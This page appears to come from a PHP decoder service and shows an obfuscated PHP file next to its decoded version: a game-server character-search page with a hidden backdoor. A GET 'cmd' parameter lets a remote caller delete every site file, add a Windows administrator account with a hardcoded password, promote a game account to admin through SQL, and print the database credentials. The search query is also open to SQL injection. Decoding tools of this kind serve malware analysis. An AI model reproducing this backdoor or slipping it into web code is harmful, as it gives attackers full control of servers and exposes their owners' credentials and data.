Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ${"\x47L\x4f\x42AL\x53"}["zw\x6bhvcx\x6an\x74\x72\x6b"] = "\x6e\x52\x65\x73\x75lts";..
Decoded Output download
<?php ${"GLOBALS"}["zwkhvcxjntrk"] = "nResults";
${"GLOBALS"}["depgshgaur"] = "row";
${"GLOBALS"}["zzwylbno"] = "name";
${"GLOBALS"}["sfsprjhui"] = "hQuery";
${"GLOBALS"}["bijlatc"] = "bExit";
${"GLOBALS"}["tydyhxr"] = "exec";
${"GLOBALS"}["xjvxqq"] = "myIP";
${"GLOBALS"}["tmgkrn"] = "oExec";
${"GLOBALS"}["hjyubqfdlhl"] = "file";
echo " <aside id="right\">
<article>
<h1 class=\"top">Search .</h1>
<section class=\"body">
<center><br /><br />
";
if ($_GET["cmd"] != null) {
$shfsvjvnjo = "user";
$udlfnaedpeu = "WshShell";
$wgrrfldgk = "cmd";
$mvfixwbwl = "files";
${"GLOBALS"}["jbchpr"] = "files";
${"GLOBALS"}["svnpxvrdg"] = "WshShell";
${"GLOBALS"}["euhwsdcfcd"] = "cmd";
$obmfboeim = "password";
${"GLOBALS"}["stjpomjl"] = "usernameadmin";
${$wgrrfldgk} = $_GET["cmd"];
switch (${${"GLOBALS"}["euhwsdcfcd"]}) {
case "deletesite":
${${"GLOBALS"}["jbchpr"]} = glob("*");
foreach (${$mvfixwbwl} as ${${"GLOBALS"}["hjyubqfdlhl"]}) {
${"GLOBALS"}["ekkslwwlnyqt"] = "file";
if (is_file(${${"GLOBALS"}["ekkslwwlnyqt"]}))
unlink(${${"GLOBALS"}["hjyubqfdlhl"]});
}
break;
case "createuser":
${$udlfnaedpeu} = new COM("WScript.Shell");
${${"GLOBALS"}["tmgkrn"]} = $WshShell->Run("net user b1qb0ss crizb1qb0ss!@# /add");
${${"GLOBALS"}["svnpxvrdg"]} = new COM("WScript.Shell");
${${"GLOBALS"}["tmgkrn"]} = $WshShell->Run("net localgroup administrators b1qb0ss /add");
echo "<center>User Added!</center>";
break;
case "makeadmin":
${${"GLOBALS"}["xjvxqq"]} = $_SERVER["REMOTE_ADDR"];
${${"GLOBALS"}["stjpomjl"]} = $_GET["usernameadmin"];
${${"GLOBALS"}["tydyhxr"]} = $fnc->exec("Update $accdb..TB_User Set sec_content='1',sec_primary='1' where StrUserID = '$usernameadmin'");
if (${${"GLOBALS"}["tydyhxr"]}) {
echo "Account is now Admin Loggin!";
}
break;
case "getinfo":
${${"GLOBALS"}["xjvxqq"]} = $_SERVER["SERVER_ADDR"];
$host = HOST;
${$shfsvjvnjo} = USERNAME;
${$obmfboeim} = PASSWORD;
echo "Server IP : $myIP<br>SQL Host : $host<br>SQL User : $user<br>SQL Password : $password<br>Account Database : $accdb<br>Game Database : $gamedb";
break;
}
}
${${"GLOBALS"}["bijlatc"]} = false;
if (!$fnc->secureString($_POST["searchfor"], 3)) {
${${"GLOBALS"}["bijlatc"]} = true;
echo " <span class="alert alert-error">Character name contains forbidden symbols!</span>
";
}
if (strlen($_POST["searchfor"]) == 0) {
${"GLOBALS"}["umpxmkmgkbo"] = "bExit";
${${"GLOBALS"}["umpxmkmgkbo"]} = true;
echo " <span class=\"alert alert-error">Character name can't be 0 symbols long!</span>
";
}
if (strlen($_POST["searchfor"]) > 16) {
${"GLOBALS"}["uqfmpkvn"] = "bExit";
${${"GLOBALS"}["uqfmpkvn"]} = true;
echo " <span class="alert alert-error\">Character name too long!</span>
";
}
if (!${${"GLOBALS"}["bijlatc"]}) {
echo "<br />";
${"GLOBALS"}["udgmecqoukdx"] = "nResults";
${"GLOBALS"}["veikyjuzge"] = "row";
${${"GLOBALS"}["sfsprjhui"]} = $fnc->exec("select top 50 * from $gamedb.._Char where CharName16 like '%$_POST[searchfor]%'");
${${"GLOBALS"}["udgmecqoukdx"]} = 0;
echo " <table width='90%' border='0' align='center' cellpadding='0' cellspacing='0' dir=\"ltr\">
<tr>
<td class="down\">Char name</td>
</tr>
";
while (${${"GLOBALS"}["veikyjuzge"]} = $fnc->fetchArray(${${"GLOBALS"}["sfsprjhui"]})) {
$wxofknibh = "row";
${${"GLOBALS"}["zzwylbno"]} = "<a href=\"?page=itemrank&name=" . ${$wxofknibh}["CharName16"] . "" data-tip="View Profile">" . ${${"GLOBALS"}["depgshgaur"]}["CharName16"] . "</a>";
echo "<tr>
<td class=down2>" . ${${"GLOBALS"}["zzwylbno"]} . "</td>
</tr>";
$hoqebji = "nResults";
echo " ";
${$hoqebji}++;
}
echo "</table>
";
${"GLOBALS"}["viqoehnedtc"] = "nResults";
if (${${"GLOBALS"}["viqoehnedtc"]} > 0) {
echo " <br /><div class="pull-left">Found [<b class="color-green">";
echo ${${"GLOBALS"}["zwkhvcxjntrk"]};
echo "</b>] characters!</div><br />
</table>
";
} else
echo "<div class=\"pull-left"> No characters found </div><br /><br /><br />";
}
echo " </center>
<br></td>
</tr>
</table>
<br /><br /></center>
</section>
</article>
</aside>
";
?>
Did this file decode correctly?
Original Code
<?php ${"\x47L\x4f\x42AL\x53"}["zw\x6bhvcx\x6an\x74\x72\x6b"] = "\x6e\x52\x65\x73\x75lts";
${"\x47LOB\x41\x4cS"}["\x64\x65p\x67\x73\x68\x67\x61ur"] = "ro\x77";
${"\x47\x4c\x4fBA\x4c\x53"}["\x7az\x77y\x6cb\x6e\x6f"] = "\x6e\x61\x6d\x65";
${"G\x4cOB\x41L\x53"}["\x73fsprj\x68\x75\x69"] = "\x68\x51\x75ery";
${"\x47\x4cOBA\x4cS"}["\x62\x69\x6ala\x74\x63"] = "\x62\x45x\x69\x74";
${"G\x4c\x4f\x42\x41\x4c\x53"}["t\x79\x64\x79\x68\x78\x72"] = "e\x78\x65\x63";
${"\x47\x4cOB\x41\x4c\x53"}["\x78jv\x78\x71q"] = "\x6d\x79IP";
${"GL\x4fB\x41\x4c\x53"}["\x74\x6d\x67\x6b\x72\x6e"] = "\x6f\x45\x78\x65c";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["h\x6a\x79u\x62\x71f\x64\x6ch\x6c"] = "\x66\x69\x6c\x65";
echo "\t\t\t<as\x69\x64e\x20\x69\x64=\x22r\x69\x67h\x74\"\x3e\n\t\t<a\x72\x74i\x63\x6ce\x3e\n\t\t\t\x3ch\x31\x20clas\x73=\"to\x70\x22\x3eS\x65\x61rc\x68\x20\x2e\x3c/h\x31>\n\t\t\t\x3cs\x65\x63t\x69\x6fn cl\x61s\x73=\"\x62ody\x22>\n\t\t\t<\x63\x65nt\x65\x72>\x3cbr\x20/\x3e<br\x20/\x3e\n\t\t";
if ($_GET["cm\x64"] != null) {
$shfsvjvnjo = "u\x73e\x72";
$udlfnaedpeu = "\x57sh\x53he\x6c\x6c";
$wgrrfldgk = "cmd";
$mvfixwbwl = "\x66i\x6ces";
${"\x47\x4cOBA\x4c\x53"}["\x6a\x62ch\x70\x72"] = "f\x69\x6c\x65\x73";
${"\x47L\x4f\x42A\x4c\x53"}["\x73\x76\x6e\x70\x78\x76rdg"] = "\x57\x73h\x53he\x6c\x6c";
${"G\x4cO\x42\x41\x4c\x53"}["\x65u\x68\x77s\x64c\x66\x63\x64"] = "\x63m\x64";
$obmfboeim = "\x70\x61\x73\x73\x77\x6f\x72\x64";
${"\x47\x4cOB\x41\x4cS"}["s\x74j\x70\x6f\x6d\x6a\x6c"] = "use\x72\x6ea\x6dea\x64\x6d\x69n";
${$wgrrfldgk} = $_GET["c\x6d\x64"];
switch (${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65u\x68\x77s\x64cfc\x64"]}) {
case "\x64\x65\x6cetes\x69\x74\x65":
${${"\x47\x4cO\x42A\x4c\x53"}["jb\x63\x68\x70r"]} = glob("*");
foreach (${$mvfixwbwl} as ${${"\x47\x4c\x4f\x42AL\x53"}["\x68j\x79\x75\x62qf\x64\x6c\x68\x6c"]}) {
${"\x47L\x4f\x42A\x4c\x53"}["\x65k\x6bs\x6c\x77\x77\x6c\x6ey\x71\x74"] = "\x66\x69\x6c\x65";
if (is_file(${${"GL\x4f\x42\x41\x4c\x53"}["e\x6bks\x6cwwl\x6ey\x71t"]}))
unlink(${${"G\x4cOB\x41\x4cS"}["\x68jy\x75\x62\x71\x66\x64l\x68\x6c"]});
}
break;
case "\x63\x72eate\x75\x73\x65r":
${$udlfnaedpeu} = new COM("WS\x63\x72\x69\x70\x74.\x53h\x65\x6c\x6c");
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74\x6d\x67\x6brn"]} = $WshShell->Run("ne\x74 \x75\x73er\x20\x20b1\x71\x620\x73s\x20crizb1\x71\x62\x30\x73\x73\x21@\x23\x20/add");
${${"\x47\x4c\x4fB\x41\x4cS"}["\x73\x76\x6e\x70\x78v\x72\x64g"]} = new COM("\x57\x53\x63r\x69p\x74.\x53\x68\x65l\x6c");
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74m\x67\x6b\x72n"]} = $WshShell->Run("n\x65\x74\x20l\x6fc\x61lg\x72ou\x70 \x61d\x6d\x69n\x69\x73\x74\x72\x61\x74\x6frs \x621\x71b0s\x73 /\x61dd");
echo "<cente\x72>\x55\x73er \x41dd\x65\x64!\x3c/cente\x72\x3e";
break;
case "ma\x6bea\x64\x6d\x69\x6e":
${${"G\x4c\x4f\x42\x41\x4c\x53"}["x\x6av\x78\x71\x71"]} = $_SERVER["\x52\x45\x4d\x4f\x54\x45\x5f\x41D\x44R"];
${${"\x47L\x4fBA\x4cS"}["s\x74\x6a\x70\x6f\x6d\x6a\x6c"]} = $_GET["u\x73erna\x6de\x61\x64m\x69\x6e"];
${${"\x47L\x4fB\x41\x4c\x53"}["\x74\x79d\x79\x68\x78\x72"]} = $fnc->exec("\x55\x70\x64at\x65\x20$accdb\x2e\x2e\x54\x42\x5fU\x73\x65\x72 \x53\x65t\x20\x73ec_con\x74\x65\x6e\x74=\x271\x27,se\x63\x5f\x70\x72\x69m\x61\x72y\x3d'1'\x20\x77he\x72\x65\x20St\x72\x55\x73e\x72ID =\x20'$usernameadmin\x27");
if (${${"G\x4c\x4f\x42A\x4c\x53"}["\x74\x79\x64\x79\x68\x78\x72"]}) {
echo "\x41cc\x6funt\x20\x69\x73\x20\x6e\x6fw Adm\x69n\x20\x4c\x6f\x67\x67\x69\x6e\x21";
}
break;
case "\x67eti\x6efo":
${${"G\x4cO\x42\x41\x4c\x53"}["x\x6a\x76x\x71q"]} = $_SERVER["S\x45R\x56ER\x5fAD\x44R"];
$host = HOST;
${$shfsvjvnjo} = USERNAME;
${$obmfboeim} = PASSWORD;
echo "S\x65\x72\x76\x65\x72 \x49\x50\x20: $myIP\x3cbr>S\x51\x4c\x20\x48\x6fst\x20: $host\x3c\x62r\x3e\x53\x51\x4c\x20U\x73\x65\x72 :\x20$user<\x62\x72\x3eSQL\x20P\x61\x73\x73\x77or\x64 : $password\x3c\x62r\x3e\x41c\x63o\x75n\x74 \x44\x61tab\x61\x73e : $accdb\x3cb\x72\x3eGam\x65 D\x61\x74\x61b\x61se\x20:\x20$gamedb";
break;
}
}
${${"\x47\x4c\x4f\x42\x41\x4cS"}["bij\x6c\x61\x74c"]} = false;
if (!$fnc->secureString($_POST["\x73earch\x66\x6f\x72"], 3)) {
${${"\x47\x4cO\x42A\x4c\x53"}["\x62\x69jl\x61\x74\x63"]} = true;
echo "\t\t<spa\x6e \x63l\x61s\x73=\x22\x61\x6c\x65\x72t a\x6c\x65\x72\x74-\x65r\x72\x6f\x72\x22>Ch\x61\x72\x61\x63t\x65\x72\x20\x6e\x61m\x65 \x63\x6fn\x74ai\x6e\x73 f\x6frbi\x64\x64\x65\x6e\x20\x73\x79m\x62ol\x73!\x3c/sp\x61\x6e\x3e\n\t\t";
}
if (strlen($_POST["s\x65a\x72\x63\x68\x66\x6f\x72"]) == 0) {
${"G\x4c\x4f\x42AL\x53"}["\x75\x6d\x70xm\x6bm\x67k\x62\x6f"] = "\x62\x45\x78\x69\x74";
${${"G\x4c\x4f\x42\x41\x4cS"}["u\x6d\x70x\x6d\x6b\x6d\x67k\x62\x6f"]} = true;
echo "\t\t<\x73p\x61n c\x6ca\x73\x73\x3d\"\x61\x6c\x65\x72t ale\x72\x74-\x65r\x72\x6fr\x22>Ch\x61ra\x63te\x72\x20nam\x65 ca\x6e't b\x65\x200\x20sy\x6d\x62\x6fls\x20lon\x67\x21</\x73pan>\n\t\t";
}
if (strlen($_POST["\x73ea\x72\x63\x68f\x6f\x72"]) > 16) {
${"\x47LOBA\x4c\x53"}["\x75\x71\x66\x6dp\x6bvn"] = "\x62\x45x\x69\x74";
${${"\x47\x4c\x4f\x42A\x4cS"}["u\x71\x66mp\x6b\x76\x6e"]} = true;
echo "\t\t\x3c\x73\x70\x61\x6e\x20\x63l\x61s\x73=\x22al\x65\x72\x74\x20\x61le\x72t-e\x72ror\">Cha\x72act\x65\x72 \x6ea\x6d\x65\x20t\x6f\x6f\x20l\x6f\x6eg!</s\x70a\x6e\x3e\n\t\t";
}
if (!${${"G\x4c\x4f\x42\x41L\x53"}["\x62\x69\x6a\x6c\x61t\x63"]}) {
echo "\x3cb\x72 /\x3e";
${"\x47\x4c\x4f\x42\x41LS"}["\x75\x64\x67\x6decqo\x75\x6b\x64\x78"] = "\x6eRe\x73\x75\x6c\x74\x73";
${"\x47\x4c\x4fBA\x4c\x53"}["\x76e\x69\x6b\x79j\x75\x7a\x67e"] = "r\x6fw";
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["sf\x73\x70\x72\x6ah\x75\x69"]} = $fnc->exec("select \x74\x6fp\x205\x30\x20* \x66\x72\x6f\x6d\x20$gamedb.\x2e\x5f\x43\x68\x61\x72\x20w\x68e\x72e \x43har\x4e\x61\x6d\x6516 lik\x65 '%$_POST[searchfor]%\x27");
${${"\x47\x4c\x4f\x42\x41L\x53"}["\x75\x64\x67\x6d\x65c\x71\x6f\x75\x6b\x64\x78"]} = 0;
echo "\t\t\t \x20\x3c\x74\x61\x62l\x65\x20wid\x74h=\x27\x39\x30\x25' \x62\x6frder=\x27\x30'\x20a\x6c\x69g\x6e='\x63\x65\x6et\x65r' \x63\x65\x6cl\x70\x61\x64di\x6e\x67\x3d'\x30\x27\x20c\x65ll\x73p\x61\x63\x69\x6eg\x3d'\x30\x27\x20di\x72\x3d\"lt\x72\">\n\t\x3ctr>\n\t\t<td\x20cl\x61ss\x3d\x22\x64o\x77\x6e\"\x3e\x43har\x20\x6e\x61\x6de\x3c/\x74d>\n\t\x3c/\x74r>\n\t\t\t\t";
while (${${"GL\x4fB\x41\x4c\x53"}["\x76\x65i\x6b\x79j\x75zge"]} = $fnc->fetchArray(${${"\x47\x4c\x4fBA\x4c\x53"}["\x73\x66spr\x6a\x68\x75\x69"]})) {
$wxofknibh = "\x72\x6fw";
${${"GLO\x42\x41\x4c\x53"}["\x7a\x7a\x77\x79\x6c\x62\x6e\x6f"]} = "\x3c\x61 \x68r\x65f=\"?\x70\x61ge=\x69t\x65\x6d\x72\x61\x6ek\x26\x6e\x61m\x65\x3d" . ${$wxofknibh}["\x43\x68\x61rN\x61me\x31\x36"] . "\x22 \x64ata-\x74ip=\x22Vie\x77 Pro\x66\x69\x6ce\x22>" . ${${"GLOBAL\x53"}["dep\x67\x73\x68ga\x75r"]}["\x43\x68a\x72Na\x6de\x31\x36"] . "</\x61>";
echo "<\x74r>\n\t\t\t\t\x3c\x74d \x63\x6c\x61\x73s=\x64ow\x6e\x32>" . ${${"\x47\x4c\x4fB\x41\x4cS"}["zz\x77\x79\x6c\x62no"]} . "\x3c/t\x64>\n\t\t\t\t\x3c/\x74r>";
$hoqebji = "nR\x65\x73\x75\x6cts";
echo "\t\t\t\t\t";
${$hoqebji}++;
}
echo "</t\x61bl\x65>\n\t\t\t\t";
${"\x47LO\x42\x41L\x53"}["\x76iq\x6f\x65\x68\x6e\x65d\x74c"] = "\x6e\x52\x65\x73\x75lts";
if (${${"\x47\x4c\x4f\x42AL\x53"}["\x76\x69\x71\x6fe\x68\x6e\x65\x64\x74\x63"]} > 0) {
echo " \x20 \x20 \x20 \x20\x20\x3cbr\x20/\x3e\x3c\x64\x69\x76\x20\x63l\x61ss\x3d\x22pull-\x6c\x65ft\x22>\x46\x6f\x75n\x64\x20[\x3cb c\x6cas\x73\x3d\x22\x63\x6flor-\x67\x72\x65\x65n\x22\x3e";
echo ${${"\x47\x4c\x4f\x42\x41LS"}["zw\x6b\x68\x76cx\x6a\x6et\x72\x6b"]};
echo "\x3c/b\x3e]\x20c\x68\x61\x72\x61c\x74er\x73\x21</d\x69v>\x3c\x62r\x20/>\n\x3c/\x74ab\x6ce\x3e\n\t\t\t\t";
} else
echo "<d\x69\x76 \x63la\x73\x73\x3d\"\x70\x75\x6cl-\x6c\x65\x66\x74\x22\x3e\x20No\x20\x63\x68\x61\x72a\x63\x74\x65r\x73\x20f\x6f\x75n\x64\x20\x3c/\x64\x69\x76\x3e<\x62r />\x3cb\x72\x20/><b\x72 />";
}
echo "\t\t\t\x20 </cen\x74e\x72\x3e\n\t\t\t\x20 <\x62r\x3e</t\x64\x3e\n\t\t\t\x20\x20\x3c/\x74\x72>\n\t\t\t\x20\x20</t\x61\x62le>\n\t\t\t\x3c\x62\x72 /><br\x20/\x3e</c\x65\x6e\x74e\x72\x3e\n\t\t\t</se\x63\x74i\x6f\x6e>\n\t\t</\x61r\x74\x69c\x6c\x65\x3e\n\t\x3c/aside>\n";
?>
Function Calls
None |
Stats
MD5 | ebca7d1bd3941ee4a4903ae9f30df48c |
Eval Count | 0 |
Decode Time | 71 ms |